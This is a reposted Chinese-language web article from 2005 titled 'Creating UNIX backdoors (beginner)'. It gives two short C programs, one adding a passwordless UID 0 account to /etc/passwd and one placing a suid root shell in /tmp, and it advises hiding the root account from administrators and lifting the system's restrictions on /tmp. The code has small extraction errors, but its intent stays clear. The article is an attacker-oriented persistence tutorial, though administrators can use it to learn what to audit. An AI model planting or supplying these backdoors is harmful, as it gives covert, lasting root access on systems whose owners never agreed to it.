您的位置:首页 > 文档 > 网络安全 >
 文章分类 

创建UNIX后门(初级篇)


创建:2005-11-07 00:00:00
作者:Unlinux
来自: http://www.Unlinux.com

  最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。
<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/shn");
}
<-->

比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)

在 /tmp 目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是最受欢迎的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。

<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->


摘自:中国E安网络联盟
作者:焦桐

转载自:http://www.unlinux.com/doc/security/20051107/8308.html

评论】 【加入收藏夹】 【 】 【打印】 【关闭
 *  请尊重我们的劳动,转载请注明出自UnLinux.Com及作者名 * 

※ 相关链接
 ·abstract类是不能创建实例的,可为什么会出现。。。。?  (2005-10-28 00:08:14)
 ·用XML数据岛创建上下文菜单  (2005-10-28 00:08:02)
 ·使用JavaScript创建智能表单  (2005-10-28 00:07:47)
 ·如何一次创建大量用户  (2005-10-28 00:00:00)
 ·LINUX系统中动态链接库的创建与使用  (2005-10-28 00:00:00)
 ·Linux下创建和使用RamDisk的技巧  (2005-10-28 00:00:00)
 ·Linux下C语言编程--进程的创建  (2005-10-28 00:00:00)
 ·libDrakx让创建用户界面变得很容易  (2005-10-28 00:00:00)
 ·和luster学习在Linux创建库函数(5)  (2005-10-28 00:00:00)
 ·和luster学习在Linux创建库函数(4)  (2005-10-28 00:00:00)

Copyright © 2005 UnLinux.Com All Rights Reserved